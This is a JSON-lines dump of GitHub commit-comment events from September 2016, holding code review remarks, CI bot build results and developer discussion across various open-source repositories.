{"id":"4563043465","type":"CommitCommentEvent","actor":{"login":"tommyent"},"repo":{"name":"joaomgcd/JoinChrome"},"payload":{"comment":{"id":19021971,"position":null,"line":null,"path":null,"commit_id":"e546fd607084bfdc1bc9000dcd84a5df0a2402c0","created_at":"2016-09-14T16:23:42Z","updated_at":"2016-09-14T16:23:42Z","body":"Definitely off I can fix it"}},"created_at":"2016-09-14T16:23:42Z"}
{"id":"4563043788","type":"CommitCommentEvent","actor":{"login":"eatyourgreens"},"repo":{"name":"zooniverse/Panoptes-Front-End"},"payload":{"comment":{"id":19021974,"position":null,"line":null,"path":null,"commit_id":"1c0437cf941d1fcd2e2f1417af4784d5f837db12","created_at":"2016-09-14T16:23:45Z","updated_at":"2016-09-14T16:23:45Z","body":"Just a note in case I forget, but I think the GET here might be the cause of #2158 which has been around for ages."}},"created_at":"2016-09-14T16:23:45Z"}
{"id":"4563045380","type":"CommitCommentEvent","actor":{"login":"crunchyNYC"},"repo":{"name":"VoyagerOne/Stockfish"},"payload":{"comment":{"id":19021977,"position":null,"line":null,"path":null,"commit_id":"6611430095fc82b427b1d42208d928036c9c5c44","created_at":"2016-09-14T16:24:00Z","updated_at":"2016-09-14T16:24:00Z","body":"Excellent!"}},"created_at":"2016-09-14T16:24:00Z"}
{"id":"4563046241","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19021981,"position":18,"line":40,"path":"src/utils/LinearAlg2D.cpp","commit_id":"4b20528a347f23231e5609aa40c1db1b350183dd","created_at":"2016-09-14T16:24:08Z","updated_at":"2016-09-14T16:24:08Z","body":"Already beat you to it ;)"}},"created_at":"2016-09-14T16:24:08Z"}
{"id":"4563049364","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19021985,"position":20,"line":42,"path":"src/utils/LinearAlg2D.cpp","commit_id":"4b20528a347f23231e5609aa40c1db1b350183dd","created_at":"2016-09-14T16:24:39Z","updated_at":"2016-09-14T16:24:39Z","body":"It's already gone..."}},"created_at":"2016-09-14T16:24:39Z"}
{"id":"4563049846","type":"CommitCommentEvent","actor":{"login":"smarter"},"repo":{"name":"felixmulder/dotty"},"payload":{"comment":{"id":19021988,"position":null,"line":null,"path":null,"commit_id":"ccc4b1921ad1e3145258f3b3aa2ca2ac3262aabe","created_at":"2016-09-14T16:24:44Z","updated_at":"2016-09-14T16:24:44Z","body":"Once you go that far, a natural extension is a \"fix-it\" mechanism like clang where the compiler gives you a possible fix for your error that can be read by the user or parsed by an IDE: http://clang.llvm.org/docs/InternalsManual.html#fix-it-hints"}},"created_at":"2016-09-14T16:24:44Z"}
{"id":"4563055679","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19022005,"position":null,"line":null,"path":null,"commit_id":"4e047aa2b40e4ace2212e1e6e15c8f24beecf3bf","created_at":"2016-09-14T16:25:43Z","updated_at":"2016-09-14T16:25:43Z","body":"versionNumbers (mitchute) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1188 of 1188 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-4e047aa2b40e4ace2212e1e6e15c8f24beecf3bf-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-4e047aa2b40e4ace2212e1e6e15c8f24beecf3bf-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-4e047aa2b40e4ace2212e1e6e15c8f24beecf3bf-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-35.97%25-green.svg)</a>\n"}},"created_at":"2016-09-14T16:25:43Z"}
{"id":"4563064104","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19022023,"position":21,"line":43,"path":"src/utils/LinearAlg2D.cpp","commit_id":"4b20528a347f23231e5609aa40c1db1b350183dd","created_at":"2016-09-14T16:27:05Z","updated_at":"2016-09-14T16:27:05Z","body":"I don't understand. That's what I'm doing!\r\n\r\nOr do you mean `px_size = vSize(a + normal(ab, ax_size))` ?"}},"created_at":"2016-09-14T16:27:05Z"}
{"id":"4563065708","type":"CommitCommentEvent","actor":{"login":"remitamine"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":19022027,"position":50,"line":73,"path":"youtube_dl/extractor/go.py","commit_id":"014b7e6b25be5583c772af054cd7a1e37a327088","created_at":"2016-09-14T16:27:20Z","updated_at":"2016-09-14T16:27:20Z","body":"Thanks, fixed in 353f340e11d7fc4a0a4973ddd85bc93b1061a487."}},"created_at":"2016-09-14T16:27:20Z"}
{"id":"4563071024","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19022044,"position":21,"line":43,"path":"src/utils/LinearAlg2D.cpp","commit_id":"4b20528a347f23231e5609aa40c1db1b350183dd","created_at":"2016-09-14T16:28:13Z","updated_at":"2016-09-14T16:28:13Z","body":"My proposal uses sqrt twice, while my implementation uses it once"}},"created_at":"2016-09-14T16:28:13Z"}
{"id":"4563073640","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19022047,"position":28,"line":50,"path":"src/utils/LinearAlg2D.cpp","commit_id":"4b20528a347f23231e5609aa40c1db1b350183dd","created_at":"2016-09-14T16:28:37Z","updated_at":"2016-09-14T16:28:37Z","body":"Yeah. typo.\r\nthanx"}},"created_at":"2016-09-14T16:28:37Z"}
{"id":"4563079161","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19022059,"position":72,"line":94,"path":"src/utils/LinearAlg2D.cpp","commit_id":"4b20528a347f23231e5609aa40c1db1b350183dd","created_at":"2016-09-14T16:29:33Z","updated_at":"2016-09-14T16:29:33Z","body":"Yeah. I didn't think adding the other two cases added a lot of explanatory value.."}},"created_at":"2016-09-14T16:29:33Z"}
{"id":"4563080670","type":"CommitCommentEvent","actor":{"login":"Oracleman200"},"repo":{"name":"Oracleman200/dragons-of-mugloar"},"payload":{"comment":{"id":19022060,"position":null,"line":null,"path":null,"commit_id":"1565078d63c9b69d03d2ec1d85f1ee32b1b41b29","created_at":"2016-09-14T16:29:48Z","updated_at":"2016-09-14T16:29:48Z","body":" blockquote, div.yahoo_quoted { margin-left: 0 !important; border-left:1px #715FFA solid !important; padding-left:1ex !important; background-color:white !important; }  Java client  updated\n\n\nSent from Yahoo Mail for iPad\n\n\nOn Wednesday, September 14, 2016, 5:32 AM, Valentyn Kolesnikov <notifications@github.com> wrote:\n\n\nYou may tro import HttpClient from package com.github.javadev.undescriptive.client.\n\nKind regsrds, Valentyn\n\n—\nYou are receiving this because you commented.\nReply to this email directly, view it on GitHub, or mute the thread.\n  \n \n\n"}},"created_at":"2016-09-14T16:29:48Z"}
{"id":"4563081707","type":"CommitCommentEvent","actor":{"login":"danielbayerlein"},"repo":{"name":"danielbayerlein/honeycomb"},"payload":{"comment":{"id":19022062,"position":3,"line":100,"path":"generator-honeycomb/app/templates/_package.json","commit_id":"4ea7a2d520c2db34b8e41dcedc5b3c5d06fe9e7d","created_at":"2016-09-14T16:29:58Z","updated_at":"2016-09-14T16:29:58Z","body":"No trailing comma"}},"created_at":"2016-09-14T16:29:58Z"}
{"id":"4563082553","type":"CommitCommentEvent","actor":{"login":"Maplicant"},"repo":{"name":"Dr-Emann/RustGame"},"payload":{"comment":{"id":19022067,"position":null,"line":null,"path":null,"commit_id":"9e2cb02d3bb6c18e8a55c2a4ec68f7ae402d4038","created_at":"2016-09-14T16:30:08Z","updated_at":"2016-09-14T16:30:08Z","body":"Nice work! I like your functional style, thanks for improving my code. I see you've beaten C++ ;)"}},"created_at":"2016-09-14T16:30:08Z"}
{"id":"4563082563","type":"CommitCommentEvent","actor":{"login":"marshallford"},"repo":{"name":"gaearon/react-hot-loader"},"payload":{"comment":{"id":19022068,"position":null,"line":null,"path":null,"commit_id":"02b1e6dc2d8068fce8bbe63cd2344935d0093909","created_at":"2016-09-14T16:30:08Z","updated_at":"2016-09-14T16:30:08Z","body":"Thanks for the fix! Can a new version be cut from this commit?"}},"created_at":"2016-09-14T16:30:08Z"}
{"id":"4563088160","type":"CommitCommentEvent","actor":{"login":"danielbayerlein"},"repo":{"name":"danielbayerlein/honeycomb"},"payload":{"comment":{"id":19022080,"position":7,"line":14,"path":"generator-honeycomb/app/templates/.config/_webpack.config.js","commit_id":"4ea7a2d520c2db34b8e41dcedc5b3c5d06fe9e7d","created_at":"2016-09-14T16:31:08Z","updated_at":"2016-09-14T16:31:08Z","body":"Please remove the unused include in the generator."}},"created_at":"2016-09-14T16:31:08Z"}
{"id":"4563092414","type":"CommitCommentEvent","actor":{"login":"emailweixu"},"repo":{"name":"baidu/Paddle"},"payload":{"comment":{"id":19022087,"position":11,"line":44,"path":"python/paddle/trainer_config_helpers/tests/layers_test_config.py","commit_id":"9f3cbed2f2b915a02f4db7dae42746b39543c29e","created_at":"2016-09-14T16:31:50Z","updated_at":"2016-09-14T16:31:50Z","body":"I think the input should be tmp for ctc_error_evaluator. Please double check"}},"created_at":"2016-09-14T16:31:50Z"}
{"id":"4563093870","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19022089,"position":21,"line":43,"path":"src/utils/LinearAlg2D.cpp","commit_id":"4b20528a347f23231e5609aa40c1db1b350183dd","created_at":"2016-09-14T16:32:07Z","updated_at":"2016-09-14T16:32:07Z","body":"We should discuss this in person."}},"created_at":"2016-09-14T16:32:07Z"}
{"id":"4563095445","type":"CommitCommentEvent","actor":{"login":"danielbayerlein"},"repo":{"name":"danielbayerlein/honeycomb"},"payload":{"comment":{"id":19022092,"position":16,"line":29,"path":"generator-honeycomb/app/templates/src/client/_.client.js","commit_id":"4ea7a2d520c2db34b8e41dcedc5b3c5d06fe9e7d","created_at":"2016-09-14T16:32:23Z","updated_at":"2016-09-14T16:32:23Z","body":"Please use the includeHandlebars instead \"else\""}},"created_at":"2016-09-14T16:32:23Z"}
{"id":"4563098134","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19022096,"position":35,"line":435,"path":"src/utils/polygon.cpp","commit_id":"baf8f49360099b22bb802a23465999cf952c6565","created_at":"2016-09-14T16:32:52Z","updated_at":"2016-09-14T16:32:52Z","body":"Yes, but here we iterate over the list, which is cheaper than deleting from a vector."}},"created_at":"2016-09-14T16:32:52Z"}
{"id":"4563098381","type":"CommitCommentEvent","actor":{"login":"sussexslanter"},"repo":{"name":"sussexslanter/dphil"},"payload":{"comment":{"id":19022098,"position":null,"line":null,"path":null,"commit_id":"830252eb9eae68c31b067b3206ca18d9266fb16f","created_at":"2016-09-14T16:32:55Z","updated_at":"2016-09-14T16:32:55Z","body":"Latest tidied up proportinal table"}},"created_at":"2016-09-14T16:32:55Z"}
{"id":"4563099645","type":"CommitCommentEvent","actor":{"login":"lplannan"},"repo":{"name":"lplannan/Creative-Poetry.-Lplannan2015-"},"payload":{"comment":{"id":19022101,"position":null,"line":null,"path":null,"commit_id":"b295d42de7d187ec67c5f463003a238a2f3e6bf7","created_at":"2016-09-14T16:33:10Z","updated_at":"2016-09-14T16:33:10Z","body":"My work includes a collection of haikus that have to do with the changing of the seasons. The process I used to create this file was grouping a collection of html files together with links. My intention with what I have made is to demonstrate my knowledge of the material we learned in class and applying it in order to create an adequate assignment. "}},"created_at":"2016-09-14T16:33:10Z"}
{"id":"4563100278","type":"CommitCommentEvent","actor":{"login":"ytest1"},"repo":{"name":"yaegor/sandbox"},"payload":{"comment":{"id":19022103,"position":null,"line":null,"path":null,"commit_id":"2de0712306d4539a89beb4cd1fefc099f08a5a3f","created_at":"2016-09-14T16:33:15Z","updated_at":"2016-09-14T16:33:15Z","body":"TeamCity Branches Tests :: Git yaegor sandbox [Build 23](http://munit-050:8112/tc/viewLog.html?buildId=99026&buildTypeId=BranchesTests_GitYaegorSandbox) is now running\n"}},"created_at":"2016-09-14T16:33:15Z"}
{"id":"4563100357","type":"CommitCommentEvent","actor":{"login":"danielbayerlein"},"repo":{"name":"danielbayerlein/honeycomb"},"payload":{"comment":{"id":19022104,"position":20,"line":33,"path":"generator-honeycomb/app/templates/src/client/_.client.js","commit_id":"4ea7a2d520c2db34b8e41dcedc5b3c5d06fe9e7d","created_at":"2016-09-14T16:33:16Z","updated_at":"2016-09-14T16:33:16Z","body":"Please use `<%_ } _%>`"}},"created_at":"2016-09-14T16:33:16Z"}
{"id":"4563100811","type":"CommitCommentEvent","actor":{"login":"lml0035"},"repo":{"name":"lml0035/practice1"},"payload":{"comment":{"id":19022105,"position":1,"line":1,"path":"README.md","commit_id":"c096367337d150ff8b459143754a34e4937207b7","created_at":"2016-09-14T16:33:21Z","updated_at":"2016-09-14T16:33:21Z","body":":-1: >I'm not sure how to get to the _terminal_"}},"created_at":"2016-09-14T16:33:21Z"}
{"id":"4563100855","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19022106,"position":null,"line":null,"path":null,"commit_id":"e57c7c521e8243a554c9cc96f79ea14b374c536d","created_at":"2016-09-14T16:33:21Z","updated_at":"2016-09-14T16:33:21Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1004](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13286&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 238, ignored: 3 Build time: 00:11:51"}},"created_at":"2016-09-14T16:33:21Z"}
{"id":"4563103417","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"BIRDRED/EDL"},"payload":{"comment":{"id":19022116,"position":null,"line":null,"path":null,"commit_id":"31725f45045ed74efca19e6ca98f412a244d0ca6","created_at":"2016-09-14T16:33:48Z","updated_at":"2016-09-14T16:33:48Z","body":"A formatação em markdown ainda não está correta."}},"created_at":"2016-09-14T16:33:48Z"}
{"id":"4563103758","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19022117,"position":50,"line":450,"path":"src/utils/polygon.cpp","commit_id":"baf8f49360099b22bb802a23465999cf952c6565","created_at":"2016-09-14T16:33:51Z","updated_at":"2016-09-14T16:33:51Z","body":"done"}},"created_at":"2016-09-14T16:33:51Z"}
{"id":"4563106192","type":"CommitCommentEvent","actor":{"login":"schebotarev"},"repo":{"name":"Barrokgl/Polka"},"payload":{"comment":{"id":19022126,"position":30,"line":95,"path":"api/dao.js","commit_id":"da9041692580732c86a6504146d16d737a6e6f73","created_at":"2016-09-14T16:34:17Z","updated_at":"2016-09-14T16:34:17Z","body":"Несколько мест содержат идентичный код работы с файлом. Подумай как можно его уменьшить."}},"created_at":"2016-09-14T16:34:17Z"}
{"id":"4563109316","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"BIRDRED/EDL"},"payload":{"comment":{"id":19022138,"position":null,"line":null,"path":null,"commit_id":"31725f45045ed74efca19e6ca98f412a244d0ca6","created_at":"2016-09-14T16:34:49Z","updated_at":"2016-09-14T16:34:49Z","body":"Desculpe, está correta sim."}},"created_at":"2016-09-14T16:34:49Z"}
{"id":"4563110040","type":"CommitCommentEvent","actor":{"login":"akerr95"},"repo":{"name":"akerr95/Metronic"},"payload":{"comment":{"id":19022143,"position":null,"line":null,"path":null,"commit_id":"2d7d3d00bdf8c7f9454350ab6614d3abfcba4117","created_at":"2016-09-14T16:34:57Z","updated_at":"2016-09-14T16:34:57Z","body":"Initial Home Page "}},"created_at":"2016-09-14T16:34:57Z"}
{"id":"4563114452","type":"CommitCommentEvent","actor":{"login":"lpinca"},"repo":{"name":"8alery/ws"},"payload":{"comment":{"id":19022151,"position":7,"line":690,"path":"lib/WebSocket.js","commit_id":"8345d4c0d5234d0d9f541a96088ad92a7b073409","created_at":"2016-09-14T16:35:43Z","updated_at":"2016-09-14T16:35:43Z","body":"I think the `length` check can be omitted, `path` is either `null` or a string of length >= `1`.\r\nI would use the following code:\r\n```js\r\nrequestOptions.path = serverUrl.path\r\n  ? serverUrl.path.charAt(0) !== '/'\r\n    ? `/${serverUrl.path}`\r\n    : serverUrl.path\r\n  : '/';\r\n```"}},"created_at":"2016-09-14T16:35:43Z"}
{"id":"4563119430","type":"CommitCommentEvent","actor":{"login":"at15"},"repo":{"name":"laohyx/electsys"},"payload":{"comment":{"id":19022158,"position":null,"line":null,"path":null,"commit_id":"d84429c25061639b1e9a07cd56de2696bd074e45","created_at":"2016-09-14T16:36:33Z","updated_at":"2016-09-14T16:36:33Z","body":"....."}},"created_at":"2016-09-14T16:36:33Z"}
{"id":"4563122306","type":"CommitCommentEvent","actor":{"login":"lygstate"},"repo":{"name":"tangrams/tangram-es"},"payload":{"comment":{"id":19022160,"position":1,"line":1,"path":"external/geojson-vt-cpp","commit_id":"1a45e26f88ad47065fbabd32554591637dd2317e","created_at":"2016-09-14T16:37:04Z","updated_at":"2016-09-14T16:37:04Z","body":"Please update geojson-vt-cpp with the visual studio fixes."}},"created_at":"2016-09-14T16:37:04Z"}
{"id":"4563122639","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19022164,"position":67,"line":467,"path":"src/utils/polygon.cpp","commit_id":"baf8f49360099b22bb802a23465999cf952c6565","created_at":"2016-09-14T16:37:08Z","updated_at":"2016-09-14T16:37:08Z","body":"Should I draw stuff?\r\nNow I have `const int64_t a1_size = shortcut_length / 2 / sin(acos(cos_angle) / 2); // compute the distance a1 == b1 to get vSize(ab)==shortcut_length with the given angle between v10 and v12`"}},"created_at":"2016-09-14T16:37:08Z"}
{"id":"4563125739","type":"CommitCommentEvent","actor":{"login":"DorNaim"},"repo":{"name":"EZ-Travel/EZTravel"},"payload":{"comment":{"id":19022169,"position":null,"line":null,"path":null,"commit_id":"880f12395acefc28cca3c3a7d72db5ffc1444fa3","created_at":"2016-09-14T16:37:39Z","updated_at":"2016-09-14T16:37:39Z","body":"The link now is outdated because of changes made to name of the ws\r\ntry this link instead\r\nhttp://localhost:8080/ez-travel/webapi/weather/getweather?lon=30&lat=30"}},"created_at":"2016-09-14T16:37:39Z"}
{"id":"4563126493","type":"CommitCommentEvent","actor":{"login":"treviser"},"repo":{"name":"initOS/odoo"},"payload":{"comment":{"id":19022173,"position":null,"line":null,"path":null,"commit_id":"b5c0e9392c94d579f8b0467f544465674d1528db","created_at":"2016-09-14T16:37:47Z","updated_at":"2016-09-14T16:37:47Z","body":"@azoellner Github tells me that you referenced my issue with your commit. Is it by accidence or does your commit help me?"}},"created_at":"2016-09-14T16:37:47Z"}
{"id":"4563132865","type":"CommitCommentEvent","actor":{"login":"schebotarev"},"repo":{"name":"Barrokgl/Polka"},"payload":{"comment":{"id":19022189,"position":22,"line":92,"path":"api/dao.js","commit_id":"bc08c3e532af4234dd77535a1c696ef6abd97fb5","created_at":"2016-09-14T16:38:56Z","updated_at":"2016-09-14T16:38:56Z","body":"Эта логика лучше смотрелась вне forEach. Логика получается проще, если forEach просто отбирает нужные книги, а уже далее, в плоском виде, код решает что делать с полученным результатом\r\n"}},"created_at":"2016-09-14T16:38:56Z"}
{"id":"4563133064","type":"CommitCommentEvent","actor":{"login":"muratabur"},"repo":{"name":"bobbypowar/fire"},"payload":{"comment":{"id":19022191,"position":null,"line":null,"path":null,"commit_id":"ea45d988724d17c4a5041ee952a3ccac73915162","created_at":"2016-09-14T16:38:58Z","updated_at":"2016-09-14T16:38:58Z","body":"Try to stick to lowercase naming, underscores instead of spaces and hyphens for everything. \r\nbase_rate is an exception in this regard as the values used come from Bloomberg tickers which are all caps. (so in theory someone could plug these directly into a Bloomberg connected system)\r\n\r\nIn the documentation make sure to note that if \"country_specific_gaap\" is chosen here, it refers to the GAAP of the country denoted in the \"country_code\" property."}},"created_at":"2016-09-14T16:38:58Z"}
{"id":"4563134583","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19022197,"position":101,"line":501,"path":"src/utils/polygon.cpp","commit_id":"baf8f49360099b22bb802a23465999cf952c6565","created_at":"2016-09-14T16:39:16Z","updated_at":"2016-09-14T16:39:16Z","body":"Because we're already in the case `vSize2(v02) >= shortcut_length * shortcut_length`\r\n\r\nhowever, the idea didn't hold up when the angle in 012 is really small and vSize(v01) >>> vSize(v12)\r\n\r\nThis code already changed"}},"created_at":"2016-09-14T16:39:16Z"}
{"id":"4563139236","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19022209,"position":140,"line":540,"path":"src/utils/polygon.cpp","commit_id":"baf8f49360099b22bb802a23465999cf952c6565","created_at":"2016-09-14T16:40:05Z","updated_at":"2016-09-14T16:40:05Z","body":"What about `p0_2` then? I cannot call it `p-1`"}},"created_at":"2016-09-14T16:40:05Z"}
{"id":"4563140457","type":"CommitCommentEvent","actor":{"login":"tommyent"},"repo":{"name":"joaomgcd/JoinChrome"},"payload":{"comment":{"id":19022215,"position":null,"line":null,"path":null,"commit_id":"e546fd607084bfdc1bc9000dcd84a5df0a2402c0","created_at":"2016-09-14T16:40:19Z","updated_at":"2016-09-14T16:40:19Z","body":"[https://github.com/joaomgcd/JoinChrome/pull/26](url)"}},"created_at":"2016-09-14T16:40:19Z"}
{"id":"4563141430","type":"CommitCommentEvent","actor":{"login":"luixxiul"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19022217,"position":null,"line":null,"path":null,"commit_id":"936f78214b4683e729fdfc758450a722f36ecd8a","created_at":"2016-09-14T16:40:27Z","updated_at":"2016-09-14T16:40:27Z","body":"++"}},"created_at":"2016-09-14T16:40:27Z"}
{"id":"4563144731","type":"CommitCommentEvent","actor":{"login":"heitorcolangelo"},"repo":{"name":"SKART1/test-butler"},"payload":{"comment":{"id":19022231,"position":null,"line":null,"path":null,"commit_id":"6008e72462ae86ac71491ee2273990d36ec8ab8b","created_at":"2016-09-14T16:40:58Z","updated_at":"2016-09-14T16:40:58Z","body":"He's what I'm doing.\r\nI have a PermissionUtils class:\r\n\r\n```java\r\npublic class PermissionUtils {\r\npublic static String revokePermission(@NonNull String packageName, @NonNull String permission) {\r\n    return executeOnShell(\"pm revoke \" + packageName + \" \" + permission);\r\n  }\r\n\r\n  private static String executeOnShell(@NonNull String command) {\r\n    StringBuilder builder = new StringBuilder(\"\");\r\n    if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.M) {\r\n      try {\r\n        Process child = Runtime.getRuntime().exec(command);\r\n        InputStream in = null;\r\n        try {\r\n          in = child.getInputStream();\r\n          BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(in));\r\n\r\n          String buffer;\r\n          while ((buffer = bufferedReader.readLine()) != null) {\r\n            builder.append(buffer);\r\n          }\r\n        } finally {\r\n          if(in != null) {\r\n            in.close();\r\n          }\r\n        }\r\n      } catch (IOException e) {\r\n        e.printStackTrace();\r\n      }\r\n    }\r\n    return builder.toString();\r\n  }\r\n}\r\n```\r\n\r\nThen in my test:\r\n```java\r\n@Before\r\n  public void beforeTest(){\r\n    String packageName = InstrumentationRegistry.getTargetContext().getPackageName();\r\n    PermissionUtils.revokePermission(packageName, Manifest.permission.CALL_PHONE);\r\n  }\r\n```\r\n\r\nBut it's not revoking the permission. Once I accept the permission, the dialog to accept never shows again.\r\nWhat am I doing wrong? It only works inside TestButlher lib?\r\n"}},"created_at":"2016-09-14T16:40:58Z"}
{"id":"4563145659","type":"CommitCommentEvent","actor":{"login":"schebotarev"},"repo":{"name":"Barrokgl/Polka"},"payload":{"comment":{"id":19022234,"position":31,"line":59,"path":"api/dao.js","commit_id":"de86e7b420e20445edf51c39af7df1756759da6e","created_at":"2016-09-14T16:41:10Z","updated_at":"2016-09-14T16:41:10Z","body":"Эти два фора определённо требуют или упрощения, или хотя бы поясняющего комментария о назначении написанного."}},"created_at":"2016-09-14T16:41:10Z"}
{"id":"4563145857","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"BIRDRED/EDL"},"payload":{"comment":{"id":19022236,"position":null,"line":null,"path":null,"commit_id":"3b3175845f3cb9c3cea56fb496ea9d75e5d2ab7d","created_at":"2016-09-14T16:41:12Z","updated_at":"2016-09-14T16:41:12Z","body":"Seria interessante colocar alguma comparação de concorrência, já que é citada como um dos pontos interessantes."}},"created_at":"2016-09-14T16:41:12Z"}
{"id":"4563146283","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19022237,"position":null,"line":null,"path":null,"commit_id":"4e047aa2b40e4ace2212e1e6e15c8f24beecf3bf","created_at":"2016-09-14T16:41:15Z","updated_at":"2016-09-14T16:41:15Z","body":"versionNumbers (mitchute) - i386-Windows-7-VisualStudio-12: OK (2334 of 2334 tests passed, 21 test warnings)\n\n * 21 tests had: EIO diffs.\n * 21 tests had: ERR diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-4e047aa2b40e4ace2212e1e6e15c8f24beecf3bf-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-4e047aa2b40e4ace2212e1e6e15c8f24beecf3bf-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-14T16:41:15Z"}
{"id":"4563149949","type":"CommitCommentEvent","actor":{"login":"dimitern"},"repo":{"name":"juju/juju"},"payload":{"comment":{"id":19022242,"position":65,"line":82,"path":"worker/uniter/runner/jujuc/network-get.go","commit_id":"d09bbc1a58423f17a10479f999849dee70240c38","created_at":"2016-09-14T16:41:53Z","updated_at":"2016-09-14T16:41:53Z","body":"Agreed - and also handle the case where address is a hostname for example :)"}},"created_at":"2016-09-14T16:41:53Z"}
{"id":"4563152999","type":"CommitCommentEvent","actor":{"login":"muratabur"},"repo":{"name":"bobbypowar/fire"},"payload":{"comment":{"id":19022249,"position":null,"line":null,"path":null,"commit_id":"a6d166e2c24af8c0e30f7f16737864571d283f57","created_at":"2016-09-14T16:42:24Z","updated_at":"2016-09-14T16:42:24Z","body":"> The official interest rate paid on commercial bank reserves by the central bank of an area or region. \r\n\r\nnot necessarily. This is just the base rate for the interest rate of the loan, theoretically it could be linked to something like Barclays own internal rate which is not necessarily the same thing as the BoE rate\r\n[http://www.barclays.co.uk/Savings/BarclaysBankBaseRate/P1242557964824](http://www.barclays.co.uk/Savings/BarclaysBankBaseRate/P1242557964824)"}},"created_at":"2016-09-14T16:42:24Z"}
{"id":"4563153417","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19022252,"position":207,"line":607,"path":"src/utils/polygon.cpp","commit_id":"baf8f49360099b22bb802a23465999cf952c6565","created_at":"2016-09-14T16:42:29Z","updated_at":"2016-09-14T16:42:29Z","body":"What kind of rounding errors? I'm not that good with float logic.."}},"created_at":"2016-09-14T16:42:29Z"}
{"id":"4563153593","type":"CommitCommentEvent","actor":{"login":"AlexHill"},"repo":{"name":"stephenmcd/mezzanine"},"payload":{"comment":{"id":19022254,"position":null,"line":null,"path":null,"commit_id":"0bf71df211f70da08a6988808795f163ae01f248","created_at":"2016-09-14T16:42:30Z","updated_at":"2016-09-14T16:42:30Z","body":"You always override - but now you have the option of your overriding\ntemplate inheriting from a template with lower precedence of the same name.\n\nShould definitely put a note in the docs yeah.\nOn Wed., 14 Sep. 2016 at 10:26 pm, ryneeverett <notifications@github.com>\nwrote:\n\n> Does this mean there is no longer any such thing as \"overriding\" a\n> template? Otherwise, how would django disambiguate between overriding and\n> extending?\n>\n> Also, is there anything worth saving in the \"Overriding vs Extending\n> Templates\" section in docs/content-architecture.rst?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/stephenmcd/mezzanine/commit/0bf71df211f70da08a6988808795f163ae01f248#commitcomment-19019837>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AA9vGzA6J3zdjnNZEKyOAPQbyOpa_pLXks5qqAQTgaJpZM4J81Ye>\n> .\n>\n"}},"created_at":"2016-09-14T16:42:30Z"}
